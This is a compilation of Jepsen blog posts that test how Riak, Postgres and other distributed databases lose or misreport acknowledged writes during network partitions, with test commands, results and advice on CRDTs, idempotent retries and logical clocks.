I don't mean to be a downer about all this. Inconsistency and even full-out data loss aren't the end of the world. Asynchronous replication is a good deal faster, both in bulk throughput and client latencies. I just think we lose sight, occasionally, of what that means for our production systems. My goal in writing Jepsen has been to push folks to consider their consistency properties carefully, and to explain them clearly to others. I think that'll help us all build safer systems. :)

Previously in Jepsen, we discussed Riak. Now we’ll review and integrate our findings.

This was a capstone post for the first four Jepsen posts; it is not the last post in the series. I’ve continued this work in the years since and produced several more posts.

We started this series with an open problem.

How do computers even work?

Notorious computer expert Joe Damato explains: “Literally no one knows.”

We’ve pushed the boundaries of our knowledge a little, though. By building a simple application which models a sequence of causally dependent writes, recording a log of that app’s view of the world, and comparing that log to the final state of the database, we were able to verify–and challenge–our assumptions about the behavior of various distributed systems. In this talk we discussed one particular type of failure mode: a stable network partition which isolated one or more primary nodes–and explored its consequences in depth.

Modeling failure modes
Unexpected consequences

In each case, the system did something… odd. Maybe we hadn’t fully thought through the consequences of the system, even if they were documented. Maybe the marketing or documentation were misleading, or flat-out lies. We saw design flaws, like the Redis Sentinel protocol. Some involved bugs, like MongoDB’s WriteConcern.MAJORITY treating network errors as successful acknowledgements. Other times we uncovered operational caveats, like Riak’s high latencies before setting up fallback vnodes. In each case, the unexpected behavior led to surprising new information about the challenge of building correct distributed systems.

In this series, we chose a simple network failure which we know happens to real production systems. The test encoded specific assumptions about concurrency, throughput, latency, timeout, error handling, and conflict resolution. The results demonstrate one point in a high-dimensional parameter space. The fraction of dropped writes in these Jepsen demos can vary wildly for all these reasons, which means we can't make general assertions about how bad the possibility of write loss really is. Mongo could lose almost all your writes, or none at all. It completely depends on the nature of your network, application, server topology, hardware, load, and the failure itself.

To apply these findings to your systems–especially in fuzzy, probabilistic ways–you’ll need to measure your assumptions about how your system behaves. Write an app that hits your API and records responses. Cause some failures and see whether the app’s log of what happened lines up with the final state of the system. The results may be surprising.

Measurement isn’t something you do just once. Ideally, your production systems should be instrumented continuously for performance and correctness. Some of these failure modes leave traces you can detect.

Some people claim that partitions don’t happen to them. If you run in EC2 or other virtualized environments, noisy neighbors and network congestion/failures are a well-known problem. Running your own hardware doesn’t make you immune either: Amazon, with some of the best datacenter engineers on the planet, considers partitions such a major problem that they were willing to design and build Dynamo. You are probably not Amazon.

Even if your network is reliable, logical failures can be partitions, too. Nodes which become so busy they fail to respond to heartbeats are a common cause of failover. Virtual machines can do all kinds of weird things to your network and clocks. Restoring from a backup can look like a partition resolving. These failures are hard to detect, so many people don't know they even occurred. You just… get slow for a while, or run across data corruption, weeks or years later, and wonder what happened.

Aiming for correctness

We’ve learned a bunch of practical lessons from these examples, and I’d like to condense them briefly:

Network errors mean “I don’t know,” not “It failed.” Make the difference between success, failure, and indeterminacy explicit in your code and APIs. Consider extending consistency algorithms through the boundaries of your systems. Hand TCP clients ETags or vector clocks. Extend CRDTs to the browser itself.
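One sketch of that first point: a client API can surface indeterminacy as its own outcome instead of collapsing timeouts into failure. The names here are illustrative, not any particular client library's API.

```python
# Sketch: model write outcomes as success / failure / indeterminate,
# rather than treating a timeout as a definite failure.
import socket

OK, FAILED, UNKNOWN = "ok", "failed", "unknown"

def classify(exc):
    """Map an exception from a network write to a tri-state outcome."""
    if exc is None:
        return OK
    if isinstance(exc, ConnectionRefusedError):
        return FAILED           # we never reached the server; safe to retry
    if isinstance(exc, socket.timeout):
        return UNKNOWN          # the write may or may not have been applied
    return UNKNOWN              # when in doubt, assume "I don't know"

assert classify(None) == OK
assert classify(ConnectionRefusedError()) == FAILED
assert classify(socket.timeout()) == UNKNOWN
```

The point of the third state is that "unknown" writes must not be blindly retried unless the operation is idempotent; they need reconciliation, not optimism.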

Even well-known, widely deployed algorithms like two-phase commit have some caveats, like false negatives. SQL transactional consistency comes in several levels. You’re probably not using the stronger ones, and if you are, your code needs to handle conflicts. It’s not usually a big deal, but keep it on your mental checklist.

Certain problems are hard to solve well, like maintaining a single authoritative record of data with primary failover. Consistency is a property of your data, not of your nodes. Avoid systems which assume node consensus implies data consistency.

Wall clocks are only useful for ensuring responsiveness in the face of deadlock, and even then they’re not a positive guarantee of correctness. Our clocks were completely synchronized in this demo and we still lost data. Even worse things can happen if a clock gets out of sync, or a node pauses for a while. Use logical clocks on your data. Distrust systems which rely on the system time, unless you’re running GPS or atomic clocks on your nodes. Measure your clock skew anyway.
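For reference, here is a minimal sketch of a logical clock in the Lamport style: event counters that respect causality without consulting the wall clock. This is the general technique, not any particular database's implementation.

```python
# Sketch of a Lamport logical clock: each node keeps a counter, and
# receiving a message advances the local clock past the sender's stamp,
# so causally-later events always get larger timestamps.

class LamportClock:
    def __init__(self):
        self.time = 0

    def tick(self):
        """A local event: advance the clock."""
        self.time += 1
        return self.time

    def send(self):
        """Stamp an outgoing message."""
        return self.tick()

    def recv(self, msg_time):
        """Merge an incoming timestamp: jump past anything we've seen."""
        self.time = max(self.time, msg_time) + 1
        return self.time

a, b = LamportClock(), LamportClock()
t = a.send()        # a stamps a message at t=1
b.recv(t)           # b's clock jumps to 2: b's later events order after a's
assert b.time > t
```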

Avoid home-grown distributed algorithms. Where correctness matters, rely on techniques with a formal proof and review in the literature. There’s a huge gulf between theoretically correct algorithm and living breathing software–especially with respect to latency–but a buggy implementation of a correct algorithm is typically better than a correct implementation of a terrible algorithm. Bugs you can fix. Designs are much harder to re-evaluate.

Choose the right design for your problem space. Some parts of your architecture demand consistency, and there is software for that. Other parts can sacrifice linearizability while remaining correct, like CRDTs. Sometimes you can afford to lose data entirely. There is often a tradeoff between performance and correctness: think, experiment, and find out.

Restricting your system with particular rules can make it easier to attain safety. Immutability is an incredibly useful property, and can be combined with a mutable CP data store for powerful hybrid systems. Use idempotent operations as much as possible: it enables all sorts of queuing and retry semantics. Go one step further, if practical, and use full CRDTs.

Preventing write loss in some weakly consistent databases, like Mongo, requires a significant latency tradeoff. It might be faster to just use Postgres. Sometimes buying ridiculously reliable network and power infrastructure is cheaper than scaling out. Sometimes not.

Replication between availability zones or between data centers is much more likely to fail than a rack or agg switch in your DC. Microsoft estimates their WAN links offer 99.5% availability, IIRC, and their LANs at 99.95%. Design your system accordingly.

Embracing failure

Hakuna my data

All this analysis, measuring, and designing takes hard work. You may not have the money, experience, hardware, motivation, or time. Every system entails risk, and not quantifying that risk is a strategy in itself.

With that in mind, consider allowing your system to drop data. Spew data everywhere and repair it gradually with bulk processes. Garbage-collect structures instead of ensuring their correctness every time. Not everyone needs correct behavior right now. Some people don’t ever need correct behavior. Look at the Facebook feed, or Twitter’s DM light.

Code you can reason about is better than code you can’t. Rely on libraries written and tested by other smart people to reduce the insane quantity of stuff you have to understand. If you don’t get how to test that your merge function is associative, commutative, and idempotent, maybe you shouldn’t be writing your own CRDTs just yet. Implementing two-phase commit on top of your database may be a warning sign.

Consistent, highly available systems are usually slow. There are proofs about the minimum number of network hops required to commit an operation in a CP system. You may want to trade correctness for performance for cost reasons, or to deliver a more responsive user experience.

I hope this work inspires you to test and improve your own distributed systems. The only reason I can talk about these mistakes is because I keep making them, over and over again. We’re all in this together. Good luck. :)

http://github.com/aphyr/jepsen

Thanks

Jepsen has consumed almost every hour of my life outside work for the last three months. I’m several hundred hours into the project now–and I couldn’t have done it without the help and encouragement of friends and strangers.

My sincerest thanks to my fellow Boundary alumni Dietrich Featherston and Joe Damato for the conversations which sparked this whole endeavor. Salvatore Sanfilippo, Jordan West, Evan Vigil-McClanahan, Jared Rosoff, and Joseph Blomstedt were instrumental in helping me understand how these databases actually work. Stephen Strowes and someone whose name I’ve sadly forgotten helped me demonstrate partitions on a local cluster in the first place. My deepest appreciation to the Postgres team, the Redis project, 10Gen and Basho for their support, and for making cool databases available to everyone for free.

Sean Cribbs and Reid Draper clued me in to CRDTs and the problems of LWW. Tom Santero and Mark Phillips invited me to give this talk at RICON East. Jepsen wouldn’t have existed without their encouragement, and I am continuously indebted to the pair. Zach Tellman, John Muellerleile, Josh O'Brien, Jared Morrow, and Ryan Zezeski helped refine my arguments and slides.

Hope I didn’t forget anyone–if so, please drop me a line. Thanks for reading.

Previously in Jepsen, we discussed MongoDB. Today, we’ll see how last-write-wins in Riak can lead to unbounded data loss.

If you like it then you Dynamo a ring on it

So far we’ve examined systems which aimed for the CP side of the CAP theorem, both with and without failover. We learned that primary-secondary failover is difficult to implement safely (though it can be done; see, for example, ZAB or Raft). Now I’d like to talk about a very different kind of database–one derived from Amazon’s Dynamo model.

Amazon designed Dynamo with the explicit goals of availability and partition tolerance–and partition-tolerant systems automatically handle node failure. It’s just a special kind of partition. In Dynamo, all nodes are equal participants in the cluster. A given object is identified by a key, which is consistently hashed into N slots (called “partitions”; not to be confused with a network partition) on a ring. Those N slots are claimed by N (hopefully distinct) nodes in the cluster, which means the system can, once data is replicated, tolerate up to N-1 node failures without losing data.

When a client reads from a Dynamo system, it specifies an R value: the number of nodes required to respond for a read to be successful. When it writes, it can specify W: the number of nodes which have to acknowledge the write. There's also DW for "durable write", and others. Riak has sometimes referred to these as "tunable CAP controls": if you choose R=W=1, your system will be available even if all but one node fail–but you may not read the latest copy of data. If R + W is greater than N, you're "guaranteed to read acknowledged writes", with caveats. The defaults tend to be R=W=quorum, where quorum is N/2+1.
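The R + W > N guarantee is simple counting: if a read quorum and a write quorum together involve more than N nodes, they must share at least one node, so the read sees the write. A brute-force sketch:

```python
# Sketch: verify by exhaustion that when r + w > n, every read quorum
# intersects every write quorum out of n replicas.
from itertools import combinations

def quorums_overlap(n, r, w):
    """True iff every set of r nodes intersects every set of w nodes."""
    nodes = set(range(n))
    return all(set(rq) & set(wq)
               for rq in combinations(nodes, r)
               for wq in combinations(nodes, w))

# With n=3 and quorum reads/writes (r=w=2), r+w=4 > 3: reads see writes.
assert quorums_overlap(3, 2, 2)
# With r=w=1, r+w=2 <= 3: a read can miss the latest write entirely.
assert not quorums_overlap(3, 1, 1)
```

The caveats come later in this post: with sloppy quorums, the "nodes" satisfying W may be fallback vnodes, which breaks the overlap argument.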

Dynamo handles partitions by healing the ring. Each connected set of machines establishes a set of fallback vnodes, to handle the portions of the ring which are no longer accessible. Once failover is complete, a Dynamo cluster split into two disjoint components will have two complete hash rings, and (eventually, as repair completes) 2 * N copies of the data (N in each component). When the partition heals, the fallback vnodes engage in hinted handoff, giving their data back to the original “primary” vnodes.

A totally connected Dynamo cluster
Two nodes are partitioned away

Since any node can accept writes for its portion of the keyspace, a Dynamo system can theoretically achieve 100% availability, even when the network fails entirely. This comes with two drawbacks. First, if no copy of a given object is available in an isolated set of nodes, that part of the cluster can accept writes for that object, but the first reads will return 404. If you’re adding items to a shopping cart and a partition occurs, your cart might appear to be empty. You could add an item to that empty cart, and it’d be stored, but depending on which side of the partition you talk to, you might see 20 items or just one.

When the partition heals, we have a new problem: it’s not clear which version of an object is authoritative. Dynamo employs a causality-tracing algorithm called vector clocks, which means it knows which copies of an object have been overwritten by updates, and which copies are actually conflicts–causally unconnected–due to concurrent writes.
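The comparison at the heart of vector clocks looks roughly like this (a sketch of the general technique, not Riak's source): one version descends from another iff its clock dominates on every entry; if neither dominates, the writes were concurrent and must be kept as conflicts.

```python
# Sketch: comparing vector clocks (maps of node -> counter). A clock
# "descends from" another iff it is >= on every entry; if neither
# dominates, the writes were concurrent and both must be preserved.

def descends(a, b):
    """True iff clock a has seen everything clock b has."""
    return all(a.get(node, 0) >= count for node, count in b.items())

def concurrent(a, b):
    return not descends(a, b) and not descends(b, a)

v1 = {"n1": 2, "n2": 1}     # an update that observed v2
v2 = {"n1": 1, "n2": 1}
v3 = {"n1": 1, "n2": 2}     # a concurrent update on the other side

assert descends(v1, v2)      # v1 overwrites v2: no conflict
assert concurrent(v1, v3)    # v1 and v3 are siblings: merge or choose
```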

Concurrent. We were talking about partitions, right? Two writes are concurrent if they happen in different components and can’t see each other’s changes, because the network didn’t let them communicate.

Well that’s interesting, because we’re also used to concurrency being a property of normal database systems. If two people read an object, then write it back with changes, those writes will also conflict. In a very real sense, partitions are just really big windows of concurrency. We often handle concurrent writes in relational databases with multi-version concurrency control or locks, but we can’t use locks here because the time horizons could be minutes or hours, and there’s no safe way to distribute a lock algorithm over a partition. We need a different approach. We need to be able to merge arbitrary conflicting objects for Dynamo to work. From the paper:

For instance, the application that maintains customer shopping carts can choose to “merge” the conflicting versions and return a single unified shopping cart. Despite this flexibility, some application developers may not want to write their own conflict resolution mechanisms and choose to push it down to the data store, which in turn chooses a simple policy such as “last write wins”.

Last write wins. That sounds like a timestamp. Didn’t we learn that Clocks Are Not To Be Trusted? Let’s try it and find out!

Riak with last-write-wins

Riak is an excellent open-source adaptation of the Dynamo model. It includes a default conflict resolution mode of last-write-wins, which means that every write includes a timestamp, and when conflicts arise, it picks the one with the higher timestamp. If our clocks are perfectly synchronized, this ensures we pick the most recent value.

To be clear: there are actually two settings in Riak which affect conflict resolution: lww=true, which turns off vector clock analysis entirely, and allow-mult=false, which uses vector clocks but picks the sibling with the highest timestamp. Allow-mult=false is safer, and that’s the setting I’m referring to by “last write wins.” All cases of data loss in this post apply to both settings, though.
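Concretely, last-write-wins resolution amounts to this (a sketch, not Riak's actual code): pick the sibling with the higher timestamp and silently drop the rest.

```python
# Sketch of last-write-wins conflict resolution: among conflicting
# siblings, keep only the value with the highest timestamp. Everything
# else is discarded, acknowledged or not.

def lww(siblings):
    """siblings: list of (timestamp, value) pairs."""
    return max(siblings, key=lambda s: s[0])[1]

# Two sides of a partition each accumulated writes into a list:
side_a = (1000, [1, 2, 3])
side_b = (1001, [1, 4, 5])   # a slightly later wall-clock timestamp

assert lww([side_a, side_b]) == [1, 4, 5]
# Writes 2 and 3 were acknowledged, and are now gone.
```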

First, let’s install Riak, join the nodes together, and tell the cluster to commit the change:

salticid riak.setup
salticid riak.join
salticid riak.commit

You can watch the logs with salticid riak.tail. Watch salticid riak.transfers until there are no handoffs remaining. The cluster is now in a stable state.

For this particular application we’ll be adding numbers to a list stored in a single Riak object. This is a typical use case for Dynamo systems–the atomic units in the system are keys, not rows or columns. Let’s run the app with last-write-wins consistency:

lein run riak lww-sloppy-quorum

Writes completed in 5.119 seconds

2000 total
2000 acknowledged
566 survivors
1434 acknowledged writes lost! (╯°□°)╯︵ ┻━┻
1 2 3 4 6 8 ... 1990 1991 1992 1995 1996 1997
1.0 ack rate
0.717 loss rate
Can't read my / can't read my / no he can't read my / Daaata raaaace!

Riak lost 71% of acknowledged writes on a fully-connected, healthy cluster. No partitions. Why?

Remember how partitions and concurrency are essentially the same problem? Simultaneous writes are causally disconnected. If two clients write values which descend from the same object, Riak just picks the write with the higher timestamp, and throws away the other write. This is a classic data race, and we know how to fix those: just add a mutex. We’ll wrap all operations against Riak in a perfectly consistent, available distributed lock.

“But you can’t do that! That violates the CAP theorem!”

Clever girl. Jepsen lets us pretend, though:

lein run lock riak-lww-sloppy-quorum

Writes completed in 21.475 seconds

2000 total
2000 acknowledged
2000 survivors
All 2000 writes succeeded. :-D

Problem solved! No more write conflicts. Now let’s see how it behaves under a partition by running salticid jepsen.partition during a run:

237 :ok
242 :ok
247 :ok
252 :ok
257 :ok
262 timeout
85  :ok
204 timeout
203 timeout
106 :ok
209 timeout
267 timeout
90  :ok
And now you won't stop calling me / I'm kinda busy

The first thing you’ll notice is that our writes start to lag hard. Some clients are waiting to replicate a write to a majority of nodes, but one side of the partition doesn’t have a majority available. Even though Riak is an AP design, it can functionally become unavailable while nodes are timing out.

Those requests time out until Riak determines those nodes are inaccessible, and sets up fallback vnodes. Once the fallback vnodes are in place, writes proceed on both sides of the cluster, because both sides have a majority of vnodes available. This is by design in Dynamo. Allowing both components to see a majority is called a sloppy quorum, and it allows both components to continue writing data with full multi-node durability guarantees. If we didn’t set up fallback vnodes, a single node failure could destroy our data.

Before collecting results, let’s heal the cluster: salticid jepsen.heal. Remember to wait for Riak to recover, by waiting until salticid riak.transfers says there’s no data left to hand off.

Writes completed in 92.773 seconds

2000 total
1985 acknowledged
176 survivors
1815 acknowledged writes lost! (╯°□°)╯︵ ┻━┻
85 90 95 100 105 106 ... 1994 1995 1996 1997 1998 1999
6 unacknowledged writes found! ヽ(´ー`)ノ
(203 204 218 234 262 277)
0.9925 ack rate
0.91435766 loss rate
0.00302267 unacknowledged but successful rate

91% data lost. This is fucking catastrophic, ladies.

And all the other nodes / Conflict with me

What happened? When the partition healed, Riak had essentially two versions of the list: one from each side of the partition (plus some slightly divergent copies on each side). Last-write-wins means we pick the one with the higher timestamp. No matter what you do, all the writes from one side or the other will be discarded.

If your Riak cluster partitions, and you write to a node which can’t reach any of the original copies of the data, that write of a fresh object can overwrite the original record–destroying all the original data.

Strict quorum

The problem is that we allowed writes to proceed on both sides of the partition. Riak has two more settings for reads and writes: PR and PW, for primary read and write, respectively. PR means you have to read a value from at least that many of the original owners of a key: fallback vnodes don’t count. If we set PR + PW >= quorum, operations against a given key will only be able to proceed on one component of a partitioned cluster. That’s a CP system, right?

lein run lock riak-lww-quorum

274  :ok
1250 :ok
279  com.basho.riak.client.RiakRetryFailedException: com.basho.riak.pbc.RiakError: {pw_val_unsatisfied,2,1}
1381 :ok
277  com.basho.riak.client.RiakRetryFailedException: com.basho.riak.pbc.RiakError: {pr_val_unsatisfied,2,1}

Here we see the cluster denying a write and a read, respectively, to clients which can’t see a majority of the primary nodes for a key. Note that because the quorums are spread around the nodes, a Dynamo system will be partially available in this mode. In any given component, you’ll be able to read and write some fraction of the keys, but not others.

2000 total
1971 acknowledged
170 survivors
1807 acknowledged writes lost! (╯°□°)╯︵ ┻━┻
86 91 95 96 100 101 ... 1994 1995 1996 1997 1998 1999
6 unacknowledged writes found! ヽ(´ー`)ノ
(193 208 219 237 249 252)
0.9855 ack rate
0.9167935 loss rate
0.00304414 unacknowledged but successful rate
You must not know CP / You must not know CP

PR=PW=R=W=quorum still allowed 92% write loss. We reported failure for more writes than before, so that’s a start–but what gives? Shouldn’t this have been CP?

The problem is that failed writes may still be partially successful. Dynamo is designed to preserve writes as much as possible. Even though a node might return “PW val unsatisfied” when it can’t replicate to the primary vnodes for a key, it may have been able to write to one primary vnode–or to any number of fallback vnodes. Those values will still be exchanged during read-repair and considered as conflicts, and the timestamp used to discard the older value–meaning all the writes from one side of the cluster can still be thrown away.

This means the minority component’s failing writes can destroy all of the majority component’s successful writes. Repeat after me: Clocks. Are. Evil.

Embrace your siblings

I can't help feeling we could have had it all

Is there no hope? Is there anything we can do to preserve my writes in Riak?

Yes. We can use CRDTs.

If we enable allow-mult in Riak, the vector clock algorithms will present both versions to the client. We can combine those objects together using a merge function. If the merge function is associative, commutative, and idempotent over that type of object, we can guarantee that it always converges to the same value regardless of the order of writes. If the merge function doesn’t discard data (like last-write-wins does), then it will preserve writes from both sides.

In this case, we’re accumulating a set of numbers. We can use set union as our merge function, or 2P sets, or OR sets, if we need to remove numbers.
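As a sketch of why union works, here's a toy state-based grow-only set in Python (an illustration, not Riak's data type): its merge is associative, commutative, and idempotent, so replicas converge no matter how merges are ordered.

```python
# Minimal state-based G-set (grow-only set) sketch. Merge is set union,
# which satisfies all three CRDT merge properties, so siblings converge
# to the same value regardless of merge order or repetition.

def merge(a, b):
    return a | b

left  = {0, 1, 2}   # writes accumulated on one side of the partition
right = {0, 3, 4}   # writes accumulated on the other

assert merge(left, right) == merge(right, left)               # commutative
assert merge(left, merge(left, right)) == merge(left, right)  # idempotent
assert merge(merge(left, right), {5}) == \
       merge(left, merge(right, {5}))                         # associative

print(sorted(merge(left, right)))  # [0, 1, 2, 3, 4]
```

No element from either side is discarded; removal requires a richer structure like a 2P set or OR set, as mentioned above.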

lein run riak-crdt
Writes completed in 80.918 seconds
2000 total
1948 acknowledged
2000 survivors
All 2000 writes succeeded. :-D

CRDTs preserve 100% of our writes. We still have false negatives in this demo, because the client timed out on a few writes which Riak was still propagating, when the partition first began. False negatives are OK, though, because state-based CRDTs are idempotent. We can repeat our writes arbitrarily many times, in any order, without duplicating data.

Moreover, CRDTs are an AP design: we can write safely and consistently even when the cluster is totally partitioned–for example, when no majority exists. They’re also eventually consistent (in a safe, data-preserving sense) when components are partitioned away from all copies of a given object and are forced to start from scratch.

All of the writes (na na na na NAA NA na na na na NAA NA)

Strategies for working with Riak

Sean Cribbs is the DARE Lion.

Enable allow-mult. Use CRDTs.

Seriously. LWW never should have been the standard behavior for a Dynamo system, but Basho made it the default after customers complained that they didn’t like the complexity of reasoning about siblings. Customers are the only reason Riak exists, and this behavior is gonna seem OK until you start experiencing partitions (and remember, fault tolerance is the reason you chose Riak in the first place), so we’re stuck with a default config which promotes simple-yet-dangerous behavior.

As a consequence of that decision, community resources which people rely on to learn how to use Riak are often aimed towards last-write-wins. Software isn’t just an artifact, but a culture around its use. I don’t really know what we can learn from this, besides the fact that engineering and culture are tough problems.

CRDTs may be too large, too complex, or too difficult to garbage-collect for your use case. However, even if you can’t structure your data as a full CRDT, writing a hacked-together merge function which just takes care of a couple important fields (say, set union over your friend list and logical OR over the other fields) can go a long way towards preventing catastrophic data loss.
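For instance, such a merge might look like this Python sketch (the record fields here are invented for illustration):

```python
# Hypothetical hacked-together merge for a user record: set union over
# the friend list, logical OR over a boolean flag, and (lossy)
# last-write-wins for everything else. Not a full CRDT, but the fields
# that matter survive a conflict.

def merge_user(a, b):
    return {
        "friends": a["friends"] | b["friends"],        # union preserves adds
        "verified?": a["verified?"] or b["verified?"], # OR: a sticky flag
        # Remaining fields still fall back to LWW by timestamp -- lossy,
        # but contained to the unimportant parts of the record.
        "bio": a["bio"] if a["ts"] >= b["ts"] else b["bio"],
        "ts": max(a["ts"], b["ts"]),
    }

a = {"friends": {"kim"}, "verified?": False, "bio": "hi",    "ts": 1}
b = {"friends": {"pat"}, "verified?": True,  "bio": "hello", "ts": 2}
print(merge_user(a, b))
```

Both siblings' friend additions and the verified flag survive; only `bio` is resolved by clock.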

There are cases where last-write-wins is a safe strategy. If your data is immutable, then it doesn’t matter which copy you choose. If your writes mean “I know the full correct state of this object at this time”, it’s safe. Many caches and backup systems look like this. If, however, your writes mean “I am changing something I read earlier,” then LWW is unsafe.

Finally, you can decide to accept dropped data. All databases will fail, in different ways, and with varying probabilities. Riak’s probability distribution might be OK for you.

Introducing locks is a bad idea. Even if they did prevent data loss–and as we saw, they don’t–you’ll impose a big latency cost. Moreover, locks restrict your system to being CP, so there’s little advantage to having an AP database. However, some really smart folks at Basho are working on adding Paxos rounds for writes which need to be CP. Having a real consensus protocol will allow Riak’s distributed writes to be truly atomic.

So: we’ve seen that Riak’s last-write-wins is fundamentally unsafe in the presence of network partitions. You can lose not only writes made during the partition, but all writes made at any time prior. Riak is an AP system, and its tunable CAP controls only allow you to detect some forms of write loss–not prevent it. You can’t add consistency to a database by tacking on a lock service because wall clock time doesn’t matter: consistency is a causal property of the relationships between the writes themselves. AP systems involve fundamentally different kinds of data structures, with their own unique tradeoffs.

In the next post, we’ll review what we’ve learned from these four distributed systems, and where we go from here.

Previously on Jepsen, we introduced the problem of network partitions. Here, we demonstrate that a few transactions which “fail” during the start of a partition may have actually succeeded.

PostgreSQL is a terrific open-source relational database. It offers a variety of consistency guarantees, from read uncommitted to serializable. Because Postgres only accepts writes on a single primary node, we think of it as a CP system in the sense of the CAP theorem. If a partition occurs and you can’t talk to the server, the system is unavailable. Because transactions are ACID, we’re always consistent.

Right?

Well… almost. Even though the Postgres server is always consistent, the distributed system composed of the server and client together may not be consistent. It’s possible for the client and server to disagree about whether or not a transaction took place.


Postgres' commit protocol, like that of most relational databases, is a special case of two-phase commit, or 2PC. In the first phase, the client votes to commit (or abort) the current transaction, and sends that message to the server. The server checks whether its consistency constraints allow the transaction to proceed, and if so, votes to commit. It writes the transaction to storage and informs the client that the commit has taken place (or failed, as the case may be). Now both the client and server agree on the outcome of the transaction.

What happens if the message acknowledging the commit is dropped before the client receives it? Then the client doesn’t know whether the commit succeeded or not! The 2PC protocol says that we must wait for the acknowledgement message to arrive in order to decide the outcome. If it doesn’t arrive, 2PC deadlocks. It’s not a partition-tolerant protocol. Waiting forever isn’t realistic for real systems, so at some point the client will time out and declare an error occurred. The commit protocol is now in an indeterminate state.

To demonstrate this, we’ll need an install of Postgres to work with.

salticid postgres.setup

This installs Postgres from apt, uploads some config files from jepsen/salticid/postgres, and creates a database for Jepsen. Then we’ll run a simple application which writes a single row for each number, inside a transaction.

cd salticid
lein run pg -n 100

If all goes well, you’ll see something like

...
85 :ok
91 :ok
90 :ok
95 :ok
96 :ok
Hit enter when ready to collect results.
Writes completed in 0.317 seconds
100 total
100 acknowledged
100 survivors
All 100 writes succeeded. :-D

Each line shows the number being written, followed by whether it was OK or not. In this example, all five nodes talk to a single postgres server on n1. Out of 100 writes, the clients reported that all 100 succeeded–and at the end of the test, all 100 numbers were present in the result set.

Now let’s cause a partition. Since this failure mode only arises when the connection drops after the server decides to acknowledge, but before the client receives it, there’s only a short window in which to begin the partition. We can widen that window by slowing down the network:

salticid jepsen.slow

Now, we start the test:

lein run pg

And while it’s running, cut off all postgres traffic to and from n1:

salticid jepsen.drop_pg

If we’re lucky, we’ll manage to catch one of those acknowledgement packets in flight, and the client will log an error like:

217 An I/O error occurred while sending to the backend.
Failure to execute query with SQL: INSERT INTO "set_app" ("element") VALUES (?) :: [219]
PSQLException:
  Message: An I/O error occured while sending to the backend.
  SQLState: 08006
  Error Code: 0
218 An I/O error occured while sending to the backend.

After that, new transactions will just time out; the client will correctly log these as failures:

220 Connection attempt timed out.
222 Connection attempt timed out.

We can resolve the partition with salticid jepsen.heal, and wait for the test to complete.

1000 total
950 acknowledged
952 survivors
2 unacknowledged writes found! ヽ(´ー`)ノ
(215 218)
0.95 ack rate
0.0 loss rate
0.002105263 unacknowledged but successful rate

So out of 1000 attempted writes, 950 were successfully acknowledged, and all 950 of those writes were present in the result set. However, two writes (215 and 218) succeeded, even though they threw an exception claiming that a failure occurred! Note that this exception doesn’t guarantee that the write succeeded or failed: 217 also threw an I/O error while sending, but because the connection dropped before the client’s commit message arrived at the server, the transaction never took place.

There is no way to distinguish these cases from the client. A network partition–and indeed, most network errors–doesn’t mean a failure. It means the absence of information. Without a partition-tolerant commit protocol, like extended three-phase commit, we cannot assert the state of the system for these writes.

2PC strategies

Two-phase commit protocols aren’t just for relational databases. They crop up in all sorts of consensus problems. MongoDB’s documents essentially comprise an asynchronous network, and many users implement 2PC on top of their Mongo objects to obtain multi-key transactions.

If you’re working with two-phase commit, there are a few things you can do. One is to accept false negatives. In most relational databases, the probability of this failure occurring is low–and it can only affect writes which were in-flight at the time the partition began. It may be perfectly acceptable to return failures to clients even if there’s a small chance the transaction succeeded.

Alternatively, you can use consistency guarantees or other data structures to allow for idempotent operations. When you encounter a network error, just retry them blindly. A highly available queue with at-least-once delivery is a great place to put repeatable writes which need to be retried later.
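Here's a toy model of that strategy in Python (the flaky `write` and its 30% ack-loss rate are invented): because the operation is idempotent, the client can retry blindly on any network error.

```python
import random

# Sketch of blind retries over an idempotent write (adding an element to
# a set). The simulated network may drop the acknowledgement after the
# server has already applied the write, but re-applying the same write
# never duplicates data, so retrying on *any* error is safe.

db = set()

def write(element):
    db.add(element)                   # applied server-side...
    if random.random() < 0.3:
        raise IOError("ack lost")     # ...but the ack may never arrive

def write_with_retries(element, attempts=10):
    for _ in range(attempts):
        try:
            write(element)
            return
        except IOError:
            continue                  # error != failure: just retry

for n in range(100):
    write_with_retries(n)
print(len(db))  # 100
```

Every write survives despite lost acks, and no retry ever double-counts, which is exactly the property that makes at-least-once delivery safe here.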

Finally, within some databases you can obtain strong consistency by taking note of the current transaction ID, and writing that ID to the database during the transaction. When the partition is resolved, the client can either retry or cancel the transaction at a later time, by checking whether or not that transaction ID was written. Again, this relies on having some sort of storage suitable for the timescales of the partition: perhaps a local log on disk, or an at-least-once queue.
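A sketch of that pattern in Python (the `committed_txns` store and `transfer` helper are hypothetical stand-ins for a real transaction-ID table and database write):

```python
import uuid

# Sketch of client-side reconciliation via a transaction-ID record.
# The client writes its own ID inside the same transaction as the real
# write; after a partition it checks whether that ID committed, instead
# of guessing from a network error.

committed_txns = set()   # stands in for a `txns` table in the database

def transfer(txn_id, apply_write):
    apply_write()                 # the real write...
    committed_txns.add(txn_id)    # ...and the ID, in the same transaction

ledger = []
txn_id = str(uuid.uuid4())
try:
    transfer(txn_id, lambda: ledger.append("debit $5"))
    raise IOError("partition: commit ack lost")   # simulated partition
except IOError:
    pass

# Later, when the partition resolves, check rather than retry blindly:
if txn_id not in committed_txns:
    transfer(txn_id, lambda: ledger.append("debit $5"))

print(ledger)  # ['debit $5']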

In the next post, we look at a very different kind of consistency model: Redis Sentinel.

This article is part of Jepsen, a series on network partitions. We're going to learn about distributed consensus, discuss the CAP theorem's implications, and demonstrate how different databases behave under partition.

Carly Rae Jepsen may be singing about the cute guy next door, but she's also telling a story about the struggle to communicate with someone who doesn't even know you're alive. The suspense of observation: did he see me? Did he see me see him? The risks of speaking your mind and being shot down–or worse, ignored. The fundamental unknowability of The Other, as Lacan would have it. In short, this is a song about distributed systems.


Modern software systems are composed of dozens of components which communicate over an asynchronous, unreliable network. Understanding the reliability of a distributed system's dynamics requires careful analysis of the network itself. Like most hard problems in computer science, this one comes down to shared state. A set of nodes separated by the network must exchange information: “Did I like that post?” “Was my write successful?” “Will you thumbnail my image?” “How much is in my account?”

At the end of one of these requests, you might guarantee that the requested operation…

  • will be visible to everyone from now on
  • will be visible to your connection now, and others later
  • may not yet be visible, but is causally connected to some future state of the system
  • is visible now, but might not be later
  • may or may not be visible: ERRNO_YOLO

These are some examples of the complex interplay between consistency and durability in distributed systems. For instance, if you're writing CRDTs to one of two geographically replicated Riak clusters with W=2 and DW=1, you can guarantee that write…

  • is causally connected to some future state of the system
  • will survive the total failure of one node
  • will survive a power failure (assuming fsync works) of all nodes
  • will survive the destruction of an entire datacenter, given a few minutes to replicate

